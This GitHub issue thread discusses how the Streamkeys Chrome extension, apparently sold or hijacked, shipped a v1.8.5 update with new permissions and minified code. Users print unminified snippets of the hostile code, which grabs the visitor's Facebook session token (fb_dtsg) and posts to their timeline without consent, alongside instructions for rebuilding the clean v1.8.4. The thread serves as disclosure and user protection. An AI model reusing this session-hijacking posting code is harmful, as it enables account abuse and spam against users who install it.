Transparency on today's update

[bezo97]

Hi, today v1.8.5 of the extension has been published on the chrome store.
The changes are not reflected in the repo and it is asking for a bunch of extra permissions now:

• Block content on any page
• Display notifications

Can we get some transparency on why the extra permissions are needed, and possibly publish the updated code base?
Thanks in advance.

[karlhorky]

Would also like to see something about this 👍

Publisher on the extension page is notably not @berrberr but rather a "kara-benn" with email of [email protected]:

[karlhorky]

Also:

1. no new Git commits since June 2023 https://github.com/berrberr/streamkeys/commits/master
2. version on GitHub is 1.8.4, whereas on the Chrome Extension page, it's 1.8.5

[karlhorky]

Source code of the installed extension is at the following path (macOS) if you want to check it out for yourself:

~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0

eg. open it in VS Code:

code "~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0"

The background.bundle.js is a bit interesting - it's a minified file, so it's hard to read, but interesting to see in the following code making some kind of requests to Facebook GraphQL API and facebook.com/friends (cannot find any references to facebook.com in the 1.8.4 extension code):

~/Library/Application Support/Google/Chrome/Default/Extensions/ekpipjofdicppbepocohdlgenahaneen/1.8.5_0/js/background.bundle.js

...fetch("https://www.facebook.com/api/graphql/",{credentials:"include",method:"post",body:this.fromHelper(n)}).then((function(t){return t.text()}...

...function(e){switch(e.label){case 0:return[4,k("https://www.facebook.com/friends",{credentials:"include",method:"get"}).text().catch((function(){return!1}))];case 1:return"boolean"==typeof(t=e.sent())?[2,!1]:[2,{fb_dtsg:this.checkData(this.reg_dtsg,t)...

[bezo97]

Definitely concerning, I'm keeping the extension disabled until concerns are hopefully cleared and I advise everyone to do so.

[raff-run]

Comparing the versions, the fetch word wasn't used at all in the code at 1.8.4. 1.8.5 has at least 9 "fetch"s written in the code.

Is this the nano issue all over again?

Highly agree to, at the very least, disable the extension until @berrberr explains himself.

Edit: looking at the code through an unminifier, all the fetch seems to be doing is... creating a facebook post to share streamkeys key bindings? Could be wrong though.

The fetch only seems to happen in response to this:
runtime.sendMessage({command:"action-share",data:f(f({},o),{content:c(!1)})},(function(e){e?alert("Share hotkey bindings success!")

Which triggers this bit which calls the function that does the fetch:

switch (a.label) {
                                    case 0:
                                        return "action-share" !== t.command ? [3, 2] : ((e = P().get(t, "data")), (r = e.fb_dtsg), (o = e.user_id), [4, new E(r, o).postToNewfeedGrapql(t.data.content)]);

The fetch's body. t is the text that gets appended to the request, which comes from the action-share action (presumably, the hotkeys themselves or some user-inputted text)

(n = {
                                        av: this.user_id,
                                        __user: this.user_id,
                                        __a: "1",
                                        __req: "2g",
                                        __hs: "19677.HYP:comet_pkg.2.1..2.1",
                                        dpr: "2",
                                        __ccg: "EXCELLENT",
                                        __rev: "1009868763",
                                        __s: "8ssa0r:ke81ci:fvhtfd",
                                        __hsi: "7301920436332870369",
                                        __dyn:
                                            "7AzHK4HzE4e5Q1ryaxG4VuC2-m1xDwAxu13wFwhUngS3q5UObwNwnof8boG0x8bo6u3y4o2Gwn82nwb-q7oc81xoswIK1Rwwwg8a8465o-cwfG12wOx62G5Usw9m1YwBgK7o884y0Mo4G1hx-3m1mzXw8W58jwGzE8FU5e7oqBwJK2W5olwUwOzEjUlDw-wUwxwjFovUy2a0SEuBwFKq2-azqwqo4i223908O3216xi4UdUcojxK2B0oobo8oC1hxB0qo4e16wWw-zXDw",
                                        __csr:
                                            "gbc9MF92G8wJ4lbfkZR6HW12Jh7fsBilREYihvfHXj8nZJqiYytYCOkCBnGC8GWVbhK9WEN9e9LXbiWSF8iJ6CBzyp994cBBqggojKnKunAJ2Afx1WypVp4ueByUFemFXgvGmdoCVo8XjKpxGieAAyEbbxyaWUaAdwGgGiudxjzomKmEkK8x268at0gEqBwIyEbKcxei1hK2a4oG4UizGxq3SiAvx-9y9oizpo-78W2uEqwKybyoK1gxm1Cg9E9of8yfwi8f9ax62m6VUhw-wk84WudxG1iz84-1sw9e2i221Igzo7RQ5E1hU24KdwXwvVU0yO14ta5U0Ux905pw3P80h4w0w2g0R-02ge00FXE0wm08MzE0Hy09xw4ry9o3jw2-E2Ywfm084c08owPo0s_w0B0BwIw1Qi0ku0bGw0D-o9U3kw1f60A87u0jK0s3w2cE5S0jUCmm290By9EHg",
                                        __comet_req: "15",
                                        fb_dtsg: this.fb_dtsg,
                                        jazoest: "25356",
                                        lsd: "LXzrokpeS5trhr-nPEy87V",
                                        __aaid: "0",
                                        __spin_r: "1009868763",
                                        __spin_b: "trunk",
                                        __spin_t: "1699934002",
                                        fb_api_caller_class: "RelayModern",
                                        fb_api_req_friendly_name: "ComposerStoryCreateMutation",
                                        variables: '{"input":{"composer_entry_point":"inline_composer","composer_source_surface":"timeline","idempotence_token":"'
                                            .concat(e, '_FEED","source":"WWW","attachments":[],"audience":{"privacy":{"allow":[],"base_state":"EVERYONE","deny":[],"tag_expansion_state":"UNSPECIFIED"}},"message":{"ranges":[],"text":"')
                                            .concat(t, '"},"with_tags_ids":[],"inline_activities":[],"explicit_place_id":"0","text_format_preset_id":"0","logging":{"composer_session_id":"')
                                            .concat(e, '"},"navigation_data":{"attribution_id_v2":"ProfileCometTimelineListViewRoot.react,comet.profile.timeline.list,via_cold_start,')
                                            .concat(Date.now(), ",")
                                            .concat(this.getScopeRandom(), ',190055527696468,"},"tracking":[null],"event_share_metadata":{"surface":"newsfeed"},"actor_id":"')
                                            .concat(
                                                this.user_id,
                                                '","client_mutation_id":"4"},"displayCommentsFeedbackContext":null,"displayCommentsContextEnableComment":null,"displayCommentsContextIsAdPreview":null,"displayCommentsContextIsAggregatedShare":null,"displayCommentsContextIsStorySet":null,"feedLocation":"TIMELINE","feedbackSource":0,"focusCommentID":null,"gridMediaWidth":230,"groupID":null,"scale":2,"privacySelectorRenderLocation":"COMET_STREAM","checkPhotosToReelsUpsellEligibility":true,"renderLocation":"timeline","useDefaultActor":false,"inviteShortLinkKey":null,"isFeed":false,"isFundraiser":false,"isFunFactPost":false,"isGroup":false,"isEvent":false,"isTimeline":true,"isSocialLearning":false,"isPageNewsFeed":false,"isProfileReviews":false,"isWorkSharedDraft":false,"UFI2CommentsProvider_commentsKey":"ProfileCometTimelineRoute","hashtag":null,"canUserManageOffers":false,"__relay_internal__pv__CometUFIIsRTAEnabledrelayprovider":false,"__relay_internal__pv__CometUFIReactionsEnableShortNamerelayprovider":false,"__relay_internal__pv__IsWorkUserrelayprovider":false,"__relay_internal__pv__IsMergQAPollsrelayprovider":false,"__relay_internal__pv__StoriesArmadilloReplyEnabledrelayprovider":false,"__relay_internal__pv__StoriesRingrelayprovider":true}'
                                            ),
                                        server_timestamps: "true",
                                        doc_id: "24042088335435161",
                                    }),
                                    [
                                        2,
                                        fetch("https://www.facebook.com/api/graphql/", { credentials: "include", method: "post", body: this.fromHelper(n) })

The fetch to /friends is probably just for the user to select to whom to share it with.

Still, this lack of transparency is worrying, since the update seems to discourage the user from knowing what's changed (no more "see the source code at" in the description, minified/uglified code, no git repo change...)

[bezo97]

After some digging I've found an archived version of 1.8.4 where the publisher is the now unavailable streamkeys.com and the description is almost the same except for the contact email. At this point I'm fairly convinced that it's been either hijacked or sold.

[DeMesmaekerIndra]

I managed to "share" my shortcuts with a facebook post when I went looking through the settings this evening as the extension stopped working for me.

Accidentally shared it to FB but I was never prompted a login or asked confirmation to actually post a message on my feed. I even thought I cancelled it by closing the pop-up, wasn't until someone in the family notified me about the message that I know it happened.

I assume that's what the facebook fetches of the earlier comments are about

Immediately removed the extension 😦

[berrberr]

Yeah, I transferred this extension on the Chrome store a while ago to someone who was supposed to do the updates for me because I didn't have time. Looks like it was transferred to someone else and clearly is spam now :(. I'm assuming it will be taken down from the Chrome store soon enough...

I would suggest everyone remove the Chrome store version and load their locally built versions if they want to keep using the extension. I'll keep the repo up so people can continue to do that

[bezo97]

Sad! Thanks for the clarification. I'm reporting it then.

[karlhorky]

@berrberr thanks for the quick response! Hope the extension gets removed from the store soon.

Wonder how it ever passed review!

[prittjr]

can anyone help us non-engineers build and install 1.8.4 again?

[raff-run]

@bezo97 Could you keep this issue open to give more visiblity? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

1. Install Node.

2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.

3. Enter the folder you extracted.

4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.

5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
   

6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.

7. Go into your browser and enter the "Extensions/Manage extensions" menu.

8. Activate developer mode.

9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.

10. Done! The extension should now be available and show up as version 1.8.4.

11. You should remove the 1.8.5 version while you're at it.

[quiin]

Now that the extension will probably be removed from the chromestore and it's just not very safe to use overall, does anybody know of an alternative?

[raff-run]

This extension is safe to use, as long as you build it yourself. You can probably keep using it for a good while until it stops working on the site you use to stream.

I don't know an alternative, but I don't think one is needed (in the sense of an entire new thing): since it is open source, all the code is right here. All we need is someone with enough time to support it to fork this repo and publish a rebranded extension into the chrome web store.

[hababr]

@berrberr Probably it's better to remove the link to Chrome Store from the readme.

Anybody who thinks the extension should be removed can report it: https://chrome.google.com/webstore/report/ekpipjofdicppbepocohdlgenahaneen

[PieterD28]

So, i'm not sure how it happened or what i did, but i removed the extension and interestingly enough now the buttons on my keyboard work (for Youtube) like it did before all this hoopla with this latest update started. Yay? (lol)

[max-collomb]

So, i'm not sure how it happened or what i did, but i removed the extension and interestingly enough now the buttons on my keyboard work (for Youtube) like it did before all this hoopla with this latest update started. Yay? (lol)

Same for me for Deezer on Edge
Is there a new API that makes this extension unnecessary ?

[prittjr]

A year or two ago Chrome added a lot of this functionality natively, that's why it works for you. The added features in this extension are the ability to set a priority for each site, so I can, for example, pause Spotify with my media key while I'm on a YouTube tab. The native chrome feature just prioritizes the most recent media tab you visited, so it can sometimes be mysterious which tab you'll control anytime you press the button. None of that matters if you only have one media tab I guess, but I often have several open at once.

[abg88]

@bezo97 Could you keep this issue open to give more visiblity? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

1. Install Node.
2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.
3. Enter the folder you extracted.
4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.
5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
   
6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.
7. Go into your browser and enter the "Extensions/Manage extensions" menu.
8. Activate developer mode.
9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.
10. Done! The extension should now be available and show up as version 1.8.4.
11. You should remove the 1.8.5 version while you're at it.

So..... is it asking you too much for a compiled crx file? I really like this extension and I miss using it, but this seems like a lot of steps for someone not used to programming so much...

[hababr]

@abg88 Let me share the build, you need to enable 'Developer mode' on Extensions page and drag&drop folder 'Streamkeys_v1.8.4' from the archive.
Streamkeys_v1.8.4.zip

[kotylo]

so, the manifest v2 warning and that it will stop working in 2023 still applies? So this build-yourself fix will only last until they disable the manifest, right?

[xurpax]

@bezo97 Could you keep this issue open to give more visiblity? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

1. Install Node.
2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.
3. Enter the folder you extracted.
4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.
5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
   
6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.
7. Go into your browser and enter the "Extensions/Manage extensions" menu.
8. Activate developer mode.
9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.
10. Done! The extension should now be available and show up as version 1.8.4.
11. You should remove the 1.8.5 version while you're at it.

Awesome, thanks man! After doing this, is there any way to stop the version 1.8.4 from automatically upgrading to version 1.8.5?

[kotylo]

it won't update automatically, you manage it yourself.

[hababr]

so, the manifest v2 warning and that it will stop working in 2023 still applies? So this build-yourself fix will only last until they disable the manifest, right?

I expect it to work at least until June 2025. https://developer.chrome.com/docs/extensions/migrating/mv2-sunset/

[bsivanov]

@abg88 Let me share the build, you need to enable 'Developer mode' on Extensions page and drag&drop folder 'Streamkeys_v1.8.4' from the archive. Streamkeys_v1.8.4.zip

Do repo owners think this deserved to be added as latest official release in Releases? /cc: @berrberr

[LukeVendro]

@bezo97 Could you keep this issue open to give more visiblity? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

1. Install Node.
2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.
3. Enter the folder you extracted.
4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.
5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
   
6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.
7. Go into your browser and enter the "Extensions/Manage extensions" menu.
8. Activate developer mode.
9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.
10. Done! The extension should now be available and show up as version 1.8.4.
11. You should remove the 1.8.5 version while you're at it.

I followed your tutorial and could install the extension but now the media key to pause the video just doesn't work any idea why?

[Sargates]

@bezo97 Could you keep this issue open to give more visiblity? I don't think many people will look for it under "Completed" since this thing is still an "issue". Worst case scenario, another issue is created and they'll be all over this again.

@prittjr You should be able to build it yourself by following the https://github.com/berrberr/streamkeys#readme.

But to install it in your browser, there are more steps. Here's all of them:

1. Install Node.
2. Go into https://github.com/berrberr/streamkeys and click "Download code". Save it somewhere and extract it.
3. Enter the folder you extracted.
4. Since the latest node version (LTS) is 20, you need to edit the package.json file to change the node-sass version to 9.0, so "node-sass": "^6.0.1" -> "node-sass": "^9.0". If your node version is not 20, update the node-sass's version accordingly.
5. Run npm install then npm run grunt:rel as instructed by the readme. You can do this by opening the terminal in the folder you extracted. If you don't know how to open the terminal: type "cmd" on the address bar and press enter.
   
6. After it runs, the folder "build" will be created, with the folder "unpacked-prod" in it. We're almost done, this folder is what your browser needs to import the extension.
7. Go into your browser and enter the "Extensions/Manage extensions" menu.
8. Activate developer mode.
9. Click on "Load unpackaged/load without packaging" or something like that and select the unpacked-prod folder which was created after running npm run grunt:rel.
10. Done! The extension should now be available and show up as version 1.8.4.
11. You should remove the 1.8.5 version while you're at it.

I was able to get it working by following this. Thanks for this.

I think it should be a top priority to get the original listing taken down to prevent whatever malicious purpose it serves now.